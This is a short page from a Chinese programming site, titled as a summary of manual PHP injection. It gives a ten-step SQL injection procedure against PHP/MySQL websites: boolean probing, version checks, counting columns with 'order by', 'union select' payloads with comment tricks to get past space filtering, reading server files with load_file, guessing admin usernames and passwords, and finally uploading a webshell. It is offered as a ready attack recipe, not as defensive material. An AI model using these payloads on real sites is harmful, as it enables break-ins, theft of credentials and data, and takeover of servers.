程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> PHP綜合 >> 手工php注入總結

手工php注入總結

編輯:PHP綜合

1.判斷是否存在注入,加';and 1=1;and 1=2

2.判斷版本 and ord(mid(version(),1,1))>51 /* 返回正常說明是4.0以上版本,可以用union  查詢

3.利用order by 暴字段,在網址後加 order by 10 /* 如果返回正常說明字段大於10

4.再利用union  來查詢准確字段,如: and 1=2 union   select 1,2,3,......./*直到返回正常,說明猜到准確字段數。如過濾了空格可以用/**/代替。

5.判斷數據庫連接帳號有沒有寫權限,and (select count(*) from mysql.user)>0 /*如果結果返回錯誤,那我們只能猜解管理員帳號和密碼了。

6.如果返回正常,則可以通過and 1=2 union   select 1,2,3,4,5,6,load_file   (char(文件路徑的ascii值,用逗號隔開)),8,9,10 /* 注:load_file   (char(文件路徑的ascii值,用逗號隔開))也可以用十六進制,通過這種方式讀取配置文件,找到數據庫連接等。

7.首先猜解user表,如: and 1=2 union   select 1,2,3,4,5,6.... from user /* 如果返回正常,說明存在這個表。

8.知道了表就猜解字段,and 1=2 union   select 1,username,3,4,5,6.... from user/*如果在2字段顯示出字段內容則存在些字段。

9.同理再猜解passWord字段,猜解成功再找後台登錄。

10.登錄後台,上傳shell。


  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved